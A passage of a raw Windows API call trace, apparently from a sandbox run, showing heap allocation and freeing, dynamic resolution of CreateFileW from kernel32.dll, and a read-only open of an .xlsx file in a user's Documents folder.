RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0078.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0078.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0078.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0078.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0078.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0078.223] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0078.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0078.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0078.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0078.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0078.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0078.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0078.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0078.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0078.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0078.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0078.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0078.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0078.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0078.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0078.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0078.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0078.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0078.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0078.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0078.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0078.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0078.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0078.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0078.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0078.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0078.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0078.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0078.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0078.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0078.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0078.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0078.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0078.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0078.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0078.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0078.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0078.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0078.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0078.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0078.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0078.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0078.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0078.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0078.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0078.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0078.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0078.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0078.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0078.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0078.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0078.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0078.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0078.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0078.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0078.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0078.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0078.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0078.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0078.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0078.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0078.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0078.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0078.226] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0078.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0078.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0078.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0078.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0078.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0078.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0078.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0078.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0078.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0078.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0078.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0078.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0078.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0078.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0078.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0078.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0078.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0078.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0078.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0078.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0078.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0078.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0078.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0078.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0078.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0078.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0078.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0078.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0078.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0078.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0078.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0078.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0078.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0078.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0078.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0078.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0078.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0078.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0078.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0078.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0078.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0078.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0078.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0078.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0078.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0078.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0078.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0078.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0078.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0078.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0078.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0078.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0078.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0078.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0078.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0078.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0078.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0078.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0078.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0078.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0078.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0078.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0078.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0078.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0078.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0078.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0078.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0078.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0078.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0078.229] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0078.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0078.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0078.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca550 [0078.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca550, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0078.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0078.230] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0078.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0078.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0078.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0078.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0078.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0078.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0078.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0078.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0078.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0078.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0078.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x43eb3a8 [0078.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0078.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0078.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0078.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0078.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0078.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0078.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0078.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0078.231] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\z6U2MzO.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\z6u2mzo.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0078.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0078.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea0b8 [0078.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0078.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0078.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0078.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0078.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0078.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0078.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0078.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0078.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0078.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0078.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0078.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0078.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0078.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369c10 [0078.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb3a8 | out: hHeap=0x1780000) returned 1 [0078.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0078.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0078.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0078.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0078.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0078.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0078.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0078.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0078.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0078.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0078.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0078.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0078.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0078.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0078.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0078.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0078.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0078.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0078.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0078.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0078.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0078.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0078.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0078.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0078.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0078.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0078.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0078.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0078.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0078.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0078.233] FreeLibrary (hLibModule=0x772d0000) returned 1 [0078.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0078.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0078.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0078.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0078.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0078.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0078.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0078.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0078.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0078.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0078.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 